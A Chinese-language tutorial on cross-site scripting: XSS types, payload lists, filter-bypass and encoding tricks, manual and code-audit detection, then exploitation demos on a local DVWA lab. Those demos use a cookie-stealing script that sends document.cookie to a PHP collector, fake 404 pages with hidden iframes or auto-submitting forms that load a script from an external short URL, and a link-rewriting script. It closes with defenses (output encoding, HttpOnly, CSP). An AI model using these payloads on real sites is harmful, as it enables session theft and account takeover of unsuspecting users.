web安全——XSS（跨站脚本）详解

XSS的原理和分类

跨站脚本攻击XSS(Cross Site Scripting)，恶意攻击者往Web页面里插入恶意Script代码，当用户浏览该页面时，嵌入Web里面的Script代码会被执行，从而达到恶意攻击用户的目的。XSS攻击针对的是用户层面的攻击！

XSS分为：存储型 、反射型 、DOM型XSS

 

 

 

 

 

反射型xss：非持久化，需要欺骗用户自己去点击链接才能触发xss代码（服务器中没有这样的页面和内容），一般容易出现在搜索页面。反射型xss大多数是用来盗取用户的Cookie信息。

存储型xss：存储型xss，持久化，代码是存储在服务器中的，如在个人信息或发表文章等地方，插入代码，如果没有过滤或过滤不严，那么这些代码将存储在服务器中，用户访问该页面的时候触发代码执行。这中xss比较危险，容易造成蠕虫，盗取cookie。

DOM型xss：不经过后端，DOM-XSS漏洞是基于文档对象模型（DOM）的一中漏洞，DOM-XSS是通过url传入参数去控制触发的，其实也属于反射型xss。

可能触发DOM型xss的属性：1、document.referer 2、window.name 3、location 4、innerHTML5、document.write

DOMxss和反射型xss的区别主要是输出地点不同。

Dom型xss是从JavaScript中输出数据到HTML页面里，其他几种xss是从服务器应用直接输出到HTML页面上的。

如图我们在URL中传入参数的值，然后客户端页面通过js脚本利用DOM的方法获得URL中参数的值，再通过DOM方法赋值给选择列表，该过程没有经过后端，完全是在前端完成的。所以，我们就可以在我们输入的参数上做手脚了。

 

 XSS的攻击载荷

以下所有标签的 > 都可以用 // 代替， 例如 <script>alert(1)</script//

<script>标签：<script>标签是最直接的XSS有效载荷，脚本标记可以引用外部的JavaScript代码，也可以将代码插入脚本标记中

<script>alert("hack")</script>   #弹出hack
<script>alert(/hack/)</script>   #弹出hack
<script>alert(1)</script>        #弹出1，对于数字可以不用引号
<script>alert(document.cookie)</script>      #弹出cookie
<script src=http://xxx.com/xss.js></script>  #引用外部的xss

svg标签 

<svg onload="alert(1)">
<svg onload="alert(1)"//

<img>标签

<img  src=1  οnerrοr=alert("hack")>
<img  src=1  οnerrοr=alert(document.cookie)>  #弹出cookie

<body>标签

<body οnlοad=alert(1)>
<body οnpageshοw=alert(1)>

video标签

<video οnlοadstart=alert(1) src="/media/hack-the-planet.mp4" />

style标签

<style οnlοad=alert(1)></style>

XSS的插入位置

• 用户输入作为script标签内容

• 用户输入作为HTML注释内容

• 用户输入作为HTML标签的属性名

• 用户输入作为HTML标签的属性值

• 用户输入作为HTML标签的名字

• 直接插入到CSS里

• 最重要的是，千万不要引入任何不可信的第三方JavaScript到页面里！

#用户输入作为HTML注释内容，导致攻击者可以进行闭合绕过
<!-- 用户输入 -->
<!-- --><script>alert('hack')</script><!-- -->
 
#用户输入作为标签属性名，导致攻击者可以进行闭合绕过
<div 用户输入="xx">  </div>
<div ></div><script>alert('hack')</script><div a="xx"> </div>
 
#用户输入作为标签属性值，导致攻击者可以进行闭合绕过
<div id="用户输入"></div>
<div id=""></div><script>alert('hack')</script><div a="x"></div>
 
#用户输入作为标签名，导致攻击者可以进行闭合绕过
<用户输入  id="xx" />
<><script>alert('hack')</script><b id="xx" />
 
#用户输入作为CSS内容，导致攻击者可以进行闭合绕过
<style>用户输入<style>
<style> </style><script>alert('hack')</script><style> </style>

检测XSS

手动检测XSS

使用手工检测Web应用程序是否存在XSS漏洞时，最重要的是考虑哪里有输入、输入的数据在什么地方输出。

使用手动检测XSS时，一定要选择有特殊意义的字符，这样可以快速测试是否存在XSS。

1、可得知输入位置

输入一些敏感字符，例如"<、>、"、0"等，在提交请求后查看HTML源代码，看这些输入的字符是否被转义。在输出这些敏感字符时，很有可能程序已经做了过滤，这样在寻找这些字符时就不太容易，这时可以输入”AAAAA>“&”字符串，然后在查找源代码的时候直接查找AAAAA比较方便。

2、无法得知输出位置

非常多的Web应用程序源代码是不对外公开的，这时在测试XSS时就有可能无法得知输入数据到底在何处显示，比如，测试某留言本是否存在XSS，那么留言之后，可能需要经过管理员的审核才能显示，这时无法得知输入的数据在后台管理页面处于何种状态，例如：

在<div>标签中：<div>XSS Test</div>

全自动检测

APPSCAN、AWVS、Burp Suite等软件，都可以有效地检测XSS跨站漏洞，但这类大型漏扫工具除检测XSS外，还会检测SQL注射、文件包含、应用程序错误等漏洞。

在检测的时候一定要工具与手工并进，才能更好地检测XSS。比如，在扫描XSS时，很多扫描器一般都无法检测非常规的XSS漏洞，为什么?例如，在提交留言时可能需要短信验证、验证码填写等，工具是无法做到的。

XSS漏洞的挖掘 

黑盒测试

尽可能找到一切用户可控并且能够输出在页面代码中的地方，比如下面这些：

• URL的每一个参数

• URL本身

• 表单

• 搜索框

常见业务场景

• 重灾区：评论区、留言区、个人信息、订单信息等

• 针对型：站内信、网页即时通讯、私信、意见反馈

• 存在风险：搜索框、当前目录、图片属性等

白盒测试(代码审计)

关于XSS的代码审计主要就是从接收参数的地方和一些关键词入手。

PHP中常见的接收参数的方式有$_GET、$_POST、$_REQUEST等等，可以搜索所有接收参数的地方。然后对接收到的数据进行跟踪，看看有没有输出到页面中，然后看输出到页面中的数据是否进行了过滤和html编码等处理。

也可以搜索类似echo这样的输出语句，跟踪输出的变量是从哪里来的，我们是否能控制，如果从数据库中取的，是否能控制存到数据库中的数据，存到数据库之前有没有进行过滤等等。

大多数程序会对接收参数封装在公共文件的函数中统一调用，我们就需要审计这些公共函数看有没有过滤，能否绕过等等。

同理审计DOM型注入可以搜索一些js操作DOM元素的关键词进行审计。

xss的攻击过程

反射型XSS漏洞：

1. Alice经常浏览某个网站，此网站为Bob所拥有。Bob的站点需要Alice使用用户名/密码进行登录，并存储了Alice敏感信息(比如银行帐户信息)。

2. Tom 发现 Bob的站点存在反射性的XSS漏洞

3. Tom 利用Bob网站的反射型XSS漏洞编写了一个exp，做成链接的形式，并利用各种手段诱使Alice点击

4. Alice在登录到Bob的站点后，浏览了 Tom 提供的恶意链接

5. 嵌入到恶意链接中的恶意脚本在Alice的浏览器中执行。此脚本盗窃敏感信息(cookie、帐号信息等信息)。然后在Alice完全不知情的情况下将这些信息发送给 Tom。

6. Tom 利用获取到的cookie就可以以Alice的身份登录Bob的站点，如果脚本的功更强大的话，Tom 还可以对Alice的浏览器做控制并进一步利用漏洞控制

存储型XSS漏洞：

1. Bob拥有一个Web站点，该站点允许用户发布信息/浏览已发布的信息。

2. Tom检测到Bob的站点存在存储型的XSS漏洞。

3. Tom在Bob的网站上发布一个带有恶意脚本的热点信息，该热点信息存储在了Bob的服务器的数据库中，然后吸引其它用户来阅读该热点信息。

4. Bob或者是任何的其他人如Alice浏览该信息之后,Tom的恶意脚本就会执行。

5. Tom的恶意脚本执行后，Tom就可以对浏览器该页面的用户发动一起XSS攻击

XSS漏洞的危害

各种类型xss的数据流向

反射型xss的数据流向：前端-->后端-->前端

存储型xss的数据流向：前端-->后端-->数据库-->后端-->前端

DOM型xss的数据流向：前端-->浏览器

xss的过滤与绕过

绕过空格

当空格被过滤了时，我们可以用 / 来代替空格：

<img/src="x"/onerror=alert(1);>

绕过引号过滤

如果是html标签中，我们可以不用引号。如果是在js中，我们可以用反引号代替单双引号：

<img src=x onerror=alert(`xss`);>

绕过括号过滤

当括号被过滤的时候可以使用throw来绕过。throw 语句用于当错误发生时抛出一个错误。

<img src=x onerror="javascript:window.onerror=alert;throw 1">
<a onmouseover="javascript:window.onerror=alert;throw 1>

字符串拼接绕过

利用eval()函数

与PHP的eval()函数相同，JavaScript的eval()函数也可以计算 JavaScript 字符串，并把它作为脚本代码来执行。

<img src="x" onerror="a='aler';b='t';c='(1)';eval(a+b+c)">
<img src="x" onerror="a=`aler`;b=`t`;c='(`xss`);';eval(a+b+c)">
// 在js中，我们可以用反引号代替单双引号

 

利用top

<script>top["al"+"ert"](`xss`);</script>
<script>top["al"+"ert"]("xss");</script>

 

区分大小写过滤标签

源代码

//前端 1.html：
<html>
<head lang="en">
    <meta charset="UTF-8">
    <title>反射型XSS</title>
</head>
<body>
    <form action="action4.php" method="post">
        <input type="text" name="name" />
        <input type="submit" value="提交">
    </form>
</body>
</html>
 
//后端 action4.php：
<?php
$name=$_POST["name"]; 
if($name!=null){
  $name=preg_replace("/<script>/","",$name);      //过滤<script>
  $name=preg_replace("/<\/script>/","",$name);   //过滤</script>
  echo $name; 
}
?>

绕过技巧：可以使用大小写绕过  <scripT>alert('hack')</scripT>

不区分大小写过滤标签

preg_replace("/<script>/i","",$name);    //不区分大小写过滤 <script>
$name=preg_replace("/<\/script>/i","",$name);  //不区分大小写过滤 </script>

绕过技巧：可以使用嵌套的script标签绕过   <scr<script>ipt>alert('hack')</scr</script>ipt>

不区分大小写，过滤之间的所有内容

$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] ); //过滤了<script  及其之间的所有内容

虽然无法使用<script>标签注入XSS代码，但是可以通过img、body等标签的事件或者 iframe 等标签的 src 注入恶意的 js 代码。

payload：  <img src=1 onerror=alert('hack')>

利用JavaScript伪协议

javascript: 这个特殊的协议类型声明了URL的主体是任意的javascript代码，它由javascript的解释器运行。当浏览器装载了这样的URL时，并不会转向某个URL，而是执行这个URL中包含的javascript代码，并把最后一条javascript语句的字符串值作为新文档的内容显示出来。

a 标签

<a href="javascript:alert(1);">xss</a>

iframe 标签

<iframe src=javascript:alert(1);></iframe>

img 标签

<img src=x onerror=alert(1)>
<img src=javascript:alert(1)>    //IE7以下

form 标签

<form action="Javascript:alert(1)"><input type=submit>

编码绕过

Javascript 中可以识别的编码类型有：

• Unicode 编码
• 八进制编码
• 十六进制编码

一般情况下我们使用Unicode编码的比较广泛，而八进制和十六进制只有在DOM环境或eval()等函数中才可以用。

Unicode编码绕过

<img src="x" onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#34;&#120;&#115;&#115;&#34;&#41;&#59;">

<img src="x" onerror="eval('\u0061\u006c\u0065\u0072\u0074\u0028\u0022\u0078\u0073\u0073\u0022\u0029\u003b')">

 

url编码绕过

<img src="x" onerror="eval(unescape('%61%6c%65%72%74%28%22%78%73%73%22%29%3b'))">
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>

Ascii码绕过

<img src="x" onerror="eval(String.fromCharCode(97,108,101,114,116,40,34,120,115,115,34,41,59))">

 

hex绕过

<img src=x onerror=eval('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')>

八进制

<img src=x onerror=alert('\170\163\163')> 

xss之htmlspecialchars:payload:q' onclick='alert(111)'

htmlspecialchars函数默认，仅编码双引号。

XSS的利用

get型

当我们输入参数的请求类型的get类型的，即我们输入的参数是以URL参数的形式。该链接的为：http://127.0.0.1/vulnerabilities/xss_r/?name=<script>alert(/xss/)</script>

我们构造了如下代码，将其保存为html页面，然后放到我们自己的服务器上，做成一个链接。当用户登录了存在漏洞的网站，并且用户点击了我们构造的恶意链接时，该链接页面会偷偷打开iframe框架，iframe会访问其中的链接，然后执行我们的js代码。该js代码会把存在漏洞网站的cookie发送到我们的平台上，但是用户却浑然不知，他会发现打开的是一个404的页面！

<iframe src="http://127.0.0.1/vulnerabilities/xss_r/?name=<script src=https://t.cn/EtxZt8T></script>" style="display:none;"></iframe>

<!DOCTYPE html>
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <title>404 页面不存在 </title>
    <style type="text/css">
        body{font:14px/1.5 'Microsoft YaHei','微软雅黑',Helvetica,Sans-serif;min-width:1200px;background:#f0f1f3;}
        .error-page{background:#f0f1f3;padding:80px 0 180px}
        .error-page-main{position:relative;background:#f9f9f9;margin:0 auto;width:617px;-ms-box-sizing:border-box;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;padding:50px 50px 70px}
        .error-page-main h3{font-size:24px;font-weight:400;border-bottom:1px solid #d0d0d0}
        .error-page-main h3 strong{font-size:54px;font-weight:400;margin-right:20px}
</style>
</head>
<body>
<iframe src="http://127.0.0.1/vulnerabilities/xss_r/?name=<script src=https://t.cn/EtxZt8T></script>" style="display:none;"></iframe>
<div class="error-page">
    <div class="error-page-container">
        <div class="error-page-main">
            <h3>
                <strong>404</strong>很抱歉，您要访问的页面不存在！
            </h3> 
        </div>
    </div>
</div>
</body>
</html>

 

post型

我们现在知道一个网站的用户名输入框存在反射型的XSS漏洞

 

 我们抓包查看

 

 

我们构造了如下代码，将其保存为html页面，然后放到我们自己的服务器上，做成一个链接。当用户登录了存在漏洞的网站，并且用户点击了我们构造的恶意链接时，该恶意链接的页面加载完后会执行js代码，完成表单的提交，表单的用户名参数是我们的恶意js代码。提交完该表单后，该js代码会把存在漏洞网站的cookie发送到我们的平台上，但是用户却浑然不知，他会发现打开的是一个404的页面。

 

我们这里写了一个404页面，404页面中隐藏了一个form提交的表单，为了防止提交表单后跳转，我们在表单下加了一个iframe框架，并且iframe框架的name等于form表单的target，并且我们设置iframe框架为不可见。

<!DOCTYPE html>
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <title>404 页面不存在 </title>
    <style type="text/css">
        body{font:14px/1.5 'Microsoft YaHei','微软雅黑',Helvetica,Sans-serif;min-width:1200px;background:#f0f1f3;}
        .error-page{background:#f0f1f3;padding:80px 0 180px}
        .error-page-main{position:relative;background:#f9f9f9;margin:0 auto;width:617px;-ms-box-sizing:border-box;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;padding:50px 50px 70px}
        .error-page-main h3{font-size:24px;font-weight:400;border-bottom:1px solid #d0d0d0}
        .error-page-main h3 strong{font-size:54px;font-weight:400;margin-right:20px}
</style>
     <script type="text/javascript">
        function attack()
{
            document.getElementById("transfer").submit();
        }
</script>
</head>
<body>
<iframe src="form.html" frameborder="0" style="display: none"></iframe>
<div class="error-page">
    <div class="error-page-container">
        <div class="error-page-main">
            <h3>
                <strong>404</strong>很抱歉，您要访问的页面不存在！
            </h3>
        </div>
    </div>
    <form method="POST" id="transfer"  action="http://127.0.0.1/xss/action.php" target="frameName">
         <input type="hidden" name="username" value="<script src=https://t.cn/EtxZt8T></script>">
         <input type="hidden" name="password" value="1">
    </form>
    <iframe src="" frameborder="0" name="frameName" style="display: none"></iframe>
</div>
</body>
</html>

当用户点击了我们构造的恶意链接，发现打开的是一个404页面。实际上这个页面偷偷的进行了表单的提交。

xss盗取用户cookie

cookie是在http协议下，服务器或脚本可以维护客户工作站上信息的一种方式。cookie是由web服务器保存在用户浏览器（客户端）上的小文本文件，它可以包含有关用户的信息。

目前有些cookie是临时的，有些是持续的。临时的cookie只在浏览器上保存一段规定的时间，一旦超过规定的时间，该cookie就会被系统清除。

盗取cookie的脚本代码是：<script>document.location='http://127.0.0.1/xss_test/cookie.php?cookie='+document.cookie</script>#

cookie.php代码：

<?php

$cookie=$_GET['cookie'];

file_put_contents('cookie.txt',$cookie);

?>

第一步，先在www文件夹下创建xss_test文件夹，在xss_test文件夹下放cookie.php文件和cookie.txt文件。

第二步，在dvwa中的xss漏洞页面，上传盗取cookie的脚本。

第三步，访问目标站点，使用bp拦截，修改cookie的值就能不用密码登录到网站。

利用网站重定向

window.onload当窗口加载时，执行匿名函数。

第一步，在dvwa中上传该Script代码

<script>

window.onload=function(){

var link=document.getElementsByTagName("a");

for(j=0;j<link.length;j++){

link[j].href="https://www.bilibili.com/video/BV19E41127R7?p=70";}

}

</script>这Script代码会修改该网页的所有a链接的链接地址。

利用该xss漏洞修改该网页的所有链接，可以用来刷某篇微博的流量。

Beef进行恶意链接生成，以及利用hook.js执行其他命令。

XSS防御

XSS防御的总体思路是：对用户的输入(和URL参数)进行过滤，对输出进行html编码。也就是对用户提交的所有内容进行过滤，对url中的参数进行过滤，过滤掉会导致脚本执行的相关内容；然后对动态输出到页面的内容进行html编码，使脚本无法在浏览器中执行。

对输出进行html编码，就是通过函数，将用户的输入的数据进行html编码，使其不能作为脚本运行。

我们还可以服务端设置会话Cookie的HTTP Only属性，这样，客户端的JS脚本就不能获取Cookie信息了

设置CSP（CSP传送门）